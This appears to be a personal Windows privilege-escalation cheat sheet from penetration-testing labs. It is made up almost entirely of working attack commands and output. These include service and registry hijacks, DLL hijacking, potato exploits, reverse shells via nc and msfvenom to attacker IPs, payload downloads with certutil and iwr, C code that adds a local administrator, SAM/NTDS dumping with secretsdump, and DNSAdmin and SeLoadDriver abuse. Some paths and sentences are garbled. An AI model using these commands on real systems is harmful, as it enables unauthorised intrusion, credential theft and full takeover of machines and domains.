Windows

solving color problem when running winPeas

REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

Some times you may need to run RunasCs after an exploit if did not work properly

Enumeration

search for password keyword in entire file system

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
findstr /si password *.txt

installed software with version

Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*, HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Format-Table -AutoSize

get windows version

wmic os get Caption, Version, OSArchitecture

(Get-WmiObject -Class Win32_OperatingSystem).Caption, (Get-WmiObject -Class Win32_OperatingSystem).Version, (Get-WmiObject -Class Win32_OperatingSystem).OSArchitecture

Get-ComputerInfo | Select-Object WindowsProductName, WindowsVersion, OSArchitecture

list all hard drive

fsutil fsinfo drives

check all hidden files in all users directory

ls -force c:\Users\*\*\*
tree /f /a  c:\Users\

search intersting files


Get-ChildItem -Path C:\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,SAM,SYSTEM -File -Recurse -ErrorAction SilentlyContinue

gci -path . -recurse -ea SilentlyContinue -Include *.ini,*yml,*.ps1,*cfg |select-string pass

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*

where /R C:\ *.config

Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

#search for password txt files
dir /s "c:\password*.txt"

data stream

dir /R 

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,649,677,824 bytes free


powershell Get-Content -Path "hm.txt" -Stream "root.txt"

search for database keepass

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

determine powershell history path

(Get-PSReadlineOption).HistorySavePath

ls C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

#looping in each history user
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

enumerating user service privileges

Get-WmiObject -Class Win32_Service -Filter "Name='Apache2.4'" | Select-Object Name, DisplayName, StartMode, StartName, State, Status

enumerate services installed on the machine

Get-Service
wmic service get DisplayName, State, StartMode
Get-WmiObject -Class Win32_Service
cmd.exe /c sc queryex state=all type=service

PowerShell history path

ls C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

enumerate schtask exe file

schtasks /query /fo LIST /v | Select-String -Pattern "\.exe"

enumerate enabled local users

Get-LocalUser

Name               Enabled Description
----               ------- -----------
Administrator      False   Built-in account for administering the computer/domain
DefaultAccount     False   A user account managed by the system.
Guest              False   Built-in account for guest access to the computer/domain
nelly              True
offsec             True
WDAGUtilityAccount False   A user account managed and used by the system for Windows Defender Application Guard scen...
...

enumerate registry

# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# SNMP Parameters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v Password

interesting conf file

#Checking these files, they may contain the administrator password in plain text or base64 encoding
C:\\Windows\Panther\Unattend\Unattended.xml  
C:\\Windows\Panther\Unattdended.xml
C:\\Windows\system32\sysprep\sysprep.xml
C:\\Windows\system32\sysprep.inf
C:\xampp\tomcat\conf\tomcat-users.xml

#sam and system files in backups
C:\Windows\Sytem32\config
C:\Windows\Sytem32\config\RegBack
C:\Windows\RegBack

enumerate GPO

Import-Module .\powerview
Get-GPO -Name "Default Domain Policy"

#get permissions
Get-GPPermission -Guid 31b2f340-016d-11d2-945f-00c04fb984f9 -TargetType User -TargetName anirudh

=> if we found this permissions we can abuse it by using SharpGpoAbuse.exe

Config files

Wordpress

Cnfig files contain MySQL database password.

#dumping creds from wordpress database
use wordpress;
show Tables;
select * from wp_users;

phpMyAdmin

Configuration files that contain passwords for database connections via MySQL

C:\wamp\apps\phpmyadmin3.4.10.1\config.inc.ini.php
C:\xampp\phpMyAdmin\config.inc.php
C:\xampp\phpMyAdmin\setup\config.php

web path of phpmyadmin

http://localhost/phpmyadmin/index.php

test connection if phpmyadmin accessible from internal

curl http://localhost/phpmyadmin -L

xampp

Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue

#contains website binds address and ports
C:\xampp\apache\conf\httpdcon

passwords.txt file contain password for mysql,webdav,FileZilla ftp,...

C:\xampp> type passwords.txt
### XAMPP Default Passwords ###

1) MySQL (phpMyAdmin):

   User: root
   Password:
   (means no password!)

2) FileZilla FTP:

   [ You have to create a new user on the FileZilla Interface ] 

3) Mercury (not in the USB & lite version): 

   Postmaster: Postmaster (postmaster@localhost)
   Administrator: Admin (admin@localhost)

   User: newuser  
   Password: wampp 

4) WEBDAV: 

   User: xampp-dav-unsecure
   Password: ppmax2011
   Attention: WEBDAV is not active since XAMPP Version 1.7.4.
   For activation please comment out the httpd-dav.conf and
   following modules in the httpd.conf
   
   LoadModule dav_module modules/mod_dav.so
   LoadModule dav_fs_module modules/mod_dav_fs.so  
   
   Please do not forget to refresh the WEBDAV authentification (users and passwords).

to start xampp server

C:\xampp\xampp_start.exe
C:\xampp\apache\bin\httpd.exe
C:\xampp\mysql\bin\mysqld.exe

check if mysql running

cmd /c sc qc Mysql

Services Exploit

Service Weak Permissions

check user permission over rsEDRSvc

accesschk.exe /accepteula -uwcqv SimpleUser rsEDRSvc

RW rsEDRSvc
        SERVICE_ALL_ACCESS

hijacked the service

sc config rsEDRSvc binpath= "C:\shell.exe"

start the service

net start rsEDRSvc

another hijacking methods

sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"

sc config <Service_Name> binpath= "net localgroup administrators username /add"

sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

net.exe start <Service_Name>

Service Binary Hijacking

enumerating running application

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

wmic service get name,displayname,pathname,startmod

determine privileges over a server

PS C:\Users\dave> icacls "C:\xampp\apache\bin\httpd.exe"
C:\xampp\apache\bin\httpd.exe BUILTIN\Administrators:(F)
                              NT AUTHORITY\SYSTEM:(F)
                              BUILTIN\Users:(RX)
                              NT AUTHORITY\Authenticated Users:(RX)

Successfully processed 1 files; Failed processing 0 files

#check which user are running this service
sc qc test

creating script with c to add new user in admin localgroup

#include <stdlib.h>

int main ()
{
  int i;
  
  i = system ("net user dave2 password123! /add");
  i = system ("net localgroup administrators dave2 /add");
  
  return 0;
}

compile it

x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

download file and replace it in service path

PS C:\Users\dave> iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe  

PS C:\Users\dave> move C:\xampp\mysql\bin\mysqld.exe mysqld.exe

PS C:\Users\dave> move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe

stop the service

net stop mysql

check startup type of the service

Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}

Name  StartMode
----  ---------
mysql Auto

shut down the machine

shutdown /r /t 0

#if we are using winrm shutdown will not work
.\RunasCs.exe x x 'shutdown /r /t 0' -l 9

Unquoted Service Paths

enumerate stopped and running services

Get-CimInstance -ClassName win32_service | Select Name,State,PathName

enumerate the unquoted path

wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """
Name                                       PathName                                                                     
...                                                                                                         
GammaService                               C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe

check permission of each path

icacls "C:\"
icacls "C:\Program Files"
icacls "C:\Program Files\Enterprise Apps"

Service DLL Hijacking

the high number of DLL hijacking vectors and ensures that DLLs are more difficult to hijack:

  1. The directory from which the application loaded.

  2. The system directory.

  3. The 16-bit system directory.

  4. The Windows directory.

  5. The current directory.

  6. The directories that are listed in the PATH environment variable.

enumerate running services

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

check permessions

icacls .\Documents\BetaServ.exe
.\Documents\BetaServ.exe NT AUTHORITY\SYSTEM:(F)
                         BUILTIN\Administrators:(F)
                         CLIENTWK220\steve:(RX)
                         CLIENTWK220\offsec:(F)

Successfully processed 1 files; Failed processing 0 files

check path en

$env:path

create a simple dll that add user

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
  	    i = system ("net user dave2 password123! /add");
  	    i = system ("net localgroup administrators dave2 /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

compile it

x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll

Weak Registry permissions

check a specific service

#enumerate service to see wich user privilege are runnning
sc qc regsvc

#check registry keys permission
C:\test\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

=> if we we found KEY_ALL_ACESS in a group we joined we can abuse it

NT AUTHORITY\INTERACTIVE (it’s a group which means essentially all logged-on users on the system)

set the path of server shell exe in the key register value

reg add HKLM\System\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\PrivESC\reverse.exe /f

check if the value was set correctly

reg query HKLM\System\CurrentControlSet\services\regsvc

check if we have permission to start the service

accesschk.exe /accepteula -uwcqv SimpleUser rsEDRSvc

start the service

net start regsvc

check all services in register

$acl = get-acl HKLM:\SYSTEM\CurrentControlSet\Services
ConvertFrom-SddlString -Sddl $acl.Sddl | Foreach-Object {$_.DiscretionaryAcl}

#search for all services with local system privileges
$services = Get-ItemProperty -Path HKLM:\System\CurrentContrlSet\Services\

$services | where {($_.ObjectName -match ‘LocalSystem’)}

#check also strated property of those that can stra manually 
$services | Where-Object {($_.ObjectName -eq "LocalSystem") **-and ($_.Start -eq 3)}

#no we want seach for service that we can strat so we will use sc to get us that and sdshadow to display security discriptors (DACLs) for all services

$services = Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\*  $services_tmp = $services | Where-Object {($_.ObjectName -eq "LocalSystem") -and ($_.Start -eq 3)}  $service_names = $services_tmp.pschildnameforeach ($name in $service_names){  
   $sddl = sc.exe sdshow $service_names -match "RP[A-Z]*?;;;AU"{ 
    $service_names  
    } 
}

#confirming strat type is 3 and localsystem priv
sc.exe qc wuauserv

#we can modify now ImagePath of the service by changing its value to an executable we own
Set-ItemProperty -path HKLM:\System\CurrentControlSet\services\wuauserv -name ImagePath -value "C:\windows\system32\spool\drivers\color\nc.exe -e powershell.exe 10.10.14.26 4447"

#strat the service 
sc.exe start wuauserv

Below are the Start Property values and their description.

The SDDL permissions for start service is RP and stop WP

  • RP — SERVICE_START

  • WP — SERVICE_STOP

Registry Exploits

AutoRuns

check autoruns programs

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    RtkAudUService    REG_SZ    "C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_c607c18cb15933d8\RtkAudUService64.exe" -background

WavesSvc    REG_SZ    "C:\Windows\System32\DriverStore\FileRepository\wavesapo8de.inf_amd64_b4d0b189ff2aba03\WavesSvc64.exe" -Jack
    KeePass 2 PreLoad    REG_SZ    "C:\Program Files\KeePass Password Safe 2\KeePass.exe" --preload

check now permissions

accesschk.exe /accepteula -wvu "C:\Program Files\KeePass Password Safe 2\KeePass.exe"

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Program Files\KeePass Password Safe 2\KeePass.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS

let's abuse it

#make backup
move "C:\Program Files\KeePass Password Safe 2\KeePass.exe" C:\Temp

#set our shell
copy /Y shell.exe "C:\Program Files\KeePass Password Safe 2\KeePass.exe"

and now we need to reboot the machine, in windows when restarting the machine the service will run with permission of the last user logging.

AlwaysElevatedPrivileges

The “Always Elevated Privileges” vulnerability occurs in Windows Installer packages (.msi) that have been designed to run with administrative privileges by default.

#check if the valued set is 0x1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

#generating msi payload with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f msi -o reverse.msi

#run the msi 
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi

Abusing Stored Passwords

Autologon

Enumerate autologon

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    
    <SNIP>
    
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    htb-student
    DefaultPassword    REG_SZ    HTB_@cademy_stdnt!

check if there any credentials on Autologon register

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"

if the value is 0x1 that means is enabled and it's contain a user creds so keep in mind we can use sekulsa::logonpasswords to retrieve it if we are admin local or there is a service or a process that is running with these creds.

Putty


#Check the values saved in each session, user/password could be there
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername"

#query the sesion found from previous command to display creds
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions

Password in Registry

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

cmdkey

#Runas CMD
cmdkey /list
runas /savecred /user:admin
runas /user:DVR4\administrator "C:\Windows\System32\cmd.exe /c C:\Users\viewer\rev.exe"

Configuration Files

search recurse for file contain pass or ending with .config

dir /s *pass* == *.config

search recurse for file contain password and also end in either .xml,.ini,.txt

findstr /si password *.xml *.ini *.txt

SAM & SYSTEM

C:\Windows\Sytem32\config
C:\Windows\Sytem32\config\RegBack
C:\Windows\RegBack
#dump SAM & System
impacket-secretsdump -ntds /root/ntds.dit -system /root/SYSTEM LOCAL

C:\Windows write permissions

we can hijack any dlls in this example we will use systeminfo’s tzres.dll

Create another reverse shell outputting the file as tzres.dll and transfer it to the victim; placing it in the c:\windows\system32\wbem directory.

hijacking systeminfo dll

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=135 -f dll -o tzres.dll

certuitl -f -urlcache http://IP C:\windows\System32\wbem\tzres.dll

#trigger the malicious dll to get a reverseshell
systeminfo

Scheduled Tasks

list all scheduled tasks

PS C:\Users\steve> schtasks /query /fo LIST /v
...
Folder: \Microsoft
HostName:                             CLIENTWK220
TaskName:                             \Microsoft\CacheCleanup
Next Run Time:                        7/11/2022 2:47:21 AM
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        7/11/2022 2:46:22 AM
Last Result:                          0
Author:                               CLIENTWK220\daveadmin
Task To Run:                          C:\Users\steve\Pictures\BackendCacheCleanup.exe
Start In:                             C:\Users\steve\Pictures
Comment:                              N/A
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode
Run As User:                          daveadmin
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only, Minute
Start Time:                           7:37:21 AM
Start Date:                           7/4/2022
...

#check this files
c:\WINDOWS\SchedLgU.Txt

#another powershell command
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

check permessions

PS C:\Users\steve> icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe
C:\Users\steve\Pictures\BackendCacheCleanup.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                BUILTIN\Administrators:(I)(F)
                                                CLIENTWK220\steve:(I)(F)
                                                CLIENTWK220\offsec:(I)(F)

monitoring exe to see if it's running as schtask

Get-Process backup -ErrorAction SilentlyContinue | Watch-Command -Difference -Continuous -Seconds 30

Windows Privileges

SeImpersonatePrivilege

Some times you may need to run RunasCs with this potato exploits.

RunasCs.exe backdoor Password123 "C:/Users/Public/reverse.exe" --force-profile --logon-type 8

1-PrintSpoofer

download PrintSpoofer

iwr -uri http://192.168.119.2/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe

exploit poc

.\PrintSpoofer64.exe -i -c powershell.exe
.\PrintSpoofer64.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
nt authority\system

=> will not work if spooler disabled in the machine 

Get-Service -Name Spooler

2-RoguePotato

in our kali machine

socat TCP-LISTEN:135,fork TCP:$IP-Target:9999

target machine

RoguePotato.exe -r $IP-Kali -e "shell.exe" -l 9999

=> will not work if 135 inbound is blocked test connection on target machine

 wget 192.168.45.168/test -usebasicparsing

3-SharpEfsPotato

SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami"

4-GodPotato

First we need to know the .NET framework version.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

executing command whoami to see if it's work

GodPotato.exe -cmd "cmd /c whoami"

#set a new password for administrator but pay attention to the old admin password you may need it later to pivote... 
GodPotato.exe -cmd "cmd /c net user Administrator Password123"

#executing a revershell
GodPotato.exe -cmd "c:\TMP\shell.exe"

5-SweetPotato

SweetPotato.exe -a whoami
.\SweetPotato.exe -e EfsRpc -p c:\Users\Public\nc.exe -a "10.10.10.10 1234 -e cmd"

=>will not work if spooler server id disabled

6-JuicyPotato

x86

.\Juicy.Potato.x86.exe -l 1360 -p c:\windows\system32\cmd.exe -a "/c whoami" -t *

Then -p to choose the program to launch with elevated privileges. Be sure to use the full path. Any arguments for the program are passed with -a and placed in quotes, followed by -t * to create the process token.

in case of failed

The default CLSID did not work, so we will hunt for a new one. It will -c argument :

.\Juicy.Potato.x86.exe -l 1360 -p c:\windows\system32\cmd.exe -a "/c whoami" -t * -c <CLSID HERE>

this site contain a list of CLSID use one.

Now that we have down the syntax of the command, start inserting CLSID’s until we find a working one

Be sure to pick CLSID’s where the user is NT AUTHORITY/SYSTEM

Over time I learned the Windows Update Service (wuauserv) is a good choice. Who shuts that off?

and it's worked

this is the complete command :

.\Juicy.Potato.x86.exe -l 1360 -p c:\windows\system32\cmd.exe -a "/c c:\users\Public\nc.exe -e cmd.exe 192.168.45.154 242" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

Automate process to find valid CLSID as system authority user

create a file named test_clsid.bat

@echo off
:: Starting port, you can change it
set /a port=10000
SETLOCAL ENABLEDELAYEDEXPANSION

FOR /F %%i IN (CLSID.list) DO (
   echo %%i !port!
   juicypotato.exe -z -l !port! -c %%i >> result.log
   set RET=!ERRORLEVEL!
   :: echo !RET!
   if "!RET!" == "1"  set /a port=port+1
)

create a file CLSID.list

put clsid list from "https://github.com/ohpe/juicy-potato/tree/master/CLSID"

run the bat file

and than use a CLSID with NT Authority\System

SeBackupPrivilege

1-RegSave.exe

.\RegSave.exe -t DC01 -o "C:\Users\svc_backup\Documents" --backup
[+] Exported \\DC01\HKLM\SAM to C:\Users\svc_backup\Documents\3BEF2064-A1DA-422E-B5D8-0086D1FB82E4
[+] Exported \\DC01\HKLM\SYSTEM to C:\Users\svc_backup\Documents\B8519DCB-2E82-4D28-AAD4-CF5428193033
[+] Exported \\DC01\HKLM\SECURITY to C:\Users\svc_backup\Documents\D4818E3E-7A32-4876-B9B7-1B9236317F27

2-SAM via registry

reg save hklm\system system
reg save hklm\sam sam

3-NTDSUtil

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

impacket-secretsdump -ntds /root/ntds.dit -system /root/SYSTEM LOCAL

4-diskshadow

create a script and encode it

$ cat kunal.dsh
set context persistent nowriters
add volume c: alias kunal
create
expose %kunal% z:

#encode
$ unix2dos kunal.dsh
unix2dos: converting file kunal.dsh to DOS format...

#or we can encode it in powershell directly
Get-Content -path kunal.dsh | set-content -path kunal.script -encoding ascii
diskshadow /s kunal.dsh
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  BABYDC,  10/23/2023 3:11:30 PM


-> set context persistent nowriters
-> add volume c: alias kunal
-> create
Alias kunal for shadow ID {69873b2c-c8cc-47c4-87f6-530b086b0eed} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {825b3882-58fd-45ec-82b4-d41c20790e90} set as environment variable.


Querying all shadow copies with the shadow copy set ID {825b3882-58fd-45ec-82b4-d41c20790e90}


* Shadow copy ID = {69873b2c-c8cc-47c4-87f6-530b086b0eed} %kunal%
- Shadow copy set: {825b3882-58fd-45ec-82b4-d41c20790e90} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{1b77e212-0000-0000-0000-100000000000}\ [C:\]
- Creation time: 10/23/2023 3:11:30 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: BabyDC.baby.vl
- Service machine: BabyDC.baby.vl
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes:  No_Auto_Release Persistent No_Writers Differential


Number of shadow copies listed: 1
-> expose %kunal% z:
-> %kunal% = {69873b2c-c8cc-47c4-87f6-530b086b0eed}
The shadow copy was successfully exposed as z:\.

using robocopy to copy ntds

robocopy /B Z:\Windows\NTDS . ntds.dit


-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------


  Started : Monday, October 23, 2023 3:16:12 PM
   Source : Z:\Windows\NTDS\
     Dest : C:\Temp\


    Files : ntds.dit


  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30


------------------------------------------------------------------------------


                   1 Z:\Windows\NTDS\
    New File    16.0 m ntds.dit
 
...


------------------------------------------------------------------------------


               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0         0
   Files :         1         1         0         0         0         0
   Bytes :   16.00 m   16.00 m         0         0         0         0
   Times :   0:00:00   0:00:00                       0:00:00   0:00:00




   Speed :           111,107,390 Bytes/sec.
   Speed :             6,357.616 MegaBytes/min.
   Ended : Monday, October 23, 2023 3:16:12 PM

The ntds was created in temp directory

PS C:\Temp> dir ntds.dit


Directory: C:\Temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/23/2023 10:52 AM 16777216 ntds.dit

5-Wbadmin

first you need to set up and smb server using that support NTFS 1-configure samba server with authentication

[global]
	map to guest = Bad User
	server role = standalone server
	usershare allow guests = yes
	idmap config * : backend = tdb
	interfaces = tun0
	smb ports = 445
[smb]
	comment = Samba
	path = /tmp/
	guest ok = yes
	read only = no
	browsable = yes
	force user = smbuser

2-Create a new user that matches the user in the force user parameter

adduser smbuser
smbpasswd -a smbuser

3-test connection in windows machine

net use k: \\10.10.14.3\smb /user:smbuser smbpass

4-backup NTDS

echo "Y" | wbadmin start backup -backuptarget:\\10.10.16.3\smb -include:c:\windows\ntds

![[Pasted image 20240919101004.png]]

5-Next, retrieve the version of the backup.

wbadmin get versions

6-We can now restore the NTDS.dit file, specifying the backup version.

echo "Y" | wbadmin start recovery -version:10/01/2020-14:23 -itemtype:file - items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl

7-We need to export the system hive too, and transfer both this and the NTDS.dit to our local machine.

reg save HKLM\SYSTEM C:\system.hive

8-copy files to our kali

cp ntds.dit \\10.10.14.3\smb\NTDS.dit 
cp system.hive \\10.10.14.3\smb\system.hive

9-dump NTDS.dit

secretsdump.py -ntds NTDS.dit -system system.hive LOCAL -history

SeRestorePrivilege

SeRestoreAbuse.exe

getting shell as local system users

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR tun0 IP> LPORT=80 -f exe -o reverse.exe

.\SeRestoreAbuse.exe C:\reverse.exe

Hijacking utilman.exe

It is worth noting that the SeRestorePrivilege being enabled can pportunity in penetration testing or ethical hacking scenarios. This privilege is designed to permit a user to restore files and d more crucially, it enables the f file permissions and ACL checks. This can be utilized to substitute system files with other files, a common technique employed scalation or retaining access.

  • By replacing utilman.exe with cmd.exe, we can access the Command Prompt from the Windows login screen without needing to log in.

  • This means that if we reboot or logout from the machine and press Windows Key + U at the login screen, instead of opening the Utility Manager, the system will launch the Command Prompt with system privileges.

  • Now opening the rdp with rdesktop we can call the utilman.exe using windows + U

SeLoadDriverPrivilege

Upload the driver eoploaddriver_x64.exe, Capcom.sys file, ExploitCapcom.exe on traget machine under writable directory.

First we need to turn on the privilege of SeLoadDriverPrivilege that is disabled.

.\eoploaddriver_x64.exe System\\CurrentControlSet\\dfserv C:\\Temp\\Capcom.sys

Now using ExploitCapcom.exe load Capcom.sys to target machine.

.\ExploitCapcom.exe LOAD C:\\Temp\\Capcom.sys

After successfully loading Capcom.sys we can now run any cmd as privilege user with EXPLOIT keyword.

.\ExploitCapcom.exe EXPLOIT whoami

Now we can generate a revshell with msfvenom. You can also use other revshell. On Attacker vm.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=4444 -f exe > shell.exe

Upload it on Traget machine. Now execute the payload.

.\ExploitCapcom.exe EXPLOIT shell.exe

You gonna get reverse shell as SYSTEM.

SeManageVolumePrivilege

exploit link , you just need to run it and you will be able to write on c:\Windows\System32

.\SeManageVolumeExploit.exe

#confirme we can write into c:\Windows\System32
echo "test" > C:\Windows\System32\test.txt

#so we can hijack and abuse anything we want
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=135 -f dll -o tzres.dll

copy tzres.dll C:\Windows\System32\wbem
systeminfo

SeTakeOwnershipPrivilege

enable it

PS C:\htb> Import-Module .\Enable-Privilege.ps1
PS C:\htb> .\EnableAllTokenPrivs.ps1
PS C:\htb> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                              State
============================= ======================================== =======
SeTakeOwnershipPrivilege      Take ownership of files or other objects Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                 Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set           Enabled

Let's check out our target file to gather a bit more information about it.

Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
 
FullName              LastWriteTime    Attributes Owner
--------                -------------         ----------
C:\Department Shares\Private\IT\cred.txt 6/18/2021  PM    Archive

Now we can use the takeown Windows binary to change ownership of the file.

PS C:\htb> takeown /f 'C:\Department Shares\Private\IT\cred.txt'
 
SUCCESS: The file (or folder): "C:\Department Shares\Private\IT\cred.txt" now owned by user "WINLPE-SRV01\htb-student".

We can confirm ownership using the same command as before. We now see that our user account is the file owner.

PS C:\htb> Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}
 
Name     Directory                       Owner
----     ---------                       -----
cred.txt C:\Department Shares\Private\IT WINLPE-SRV01\htb-student

Let's grant our user full privileges over the target file.

PS C:\htb> icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F

processed file: C:\Department Shares\Private\IT\cred.txt
Successfully processed 1 files; Failed processing 0 files

some interesting files we can take

c:\inetpub\wwwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav

Groups Privileges

DNS Admin


#generate a dll with msfvenom
msfvenom -p windows/x64/exec cmd='net user administrator P@s5w0rd123! /domain' -f dll > da.dll

#strat smb server remotely to avoid trigger AV
sudo impacket-smbserver.py share ./

# dnscmd utility can be used to set the remote DLL path into the Windows Registry
cmd /c dnscmd localhost /config /serverlevelplugindll \\10.10.14.9\share\da.dll

#restart dns service
sc.exe stop dns
sc.exe start dns

#login as administrator
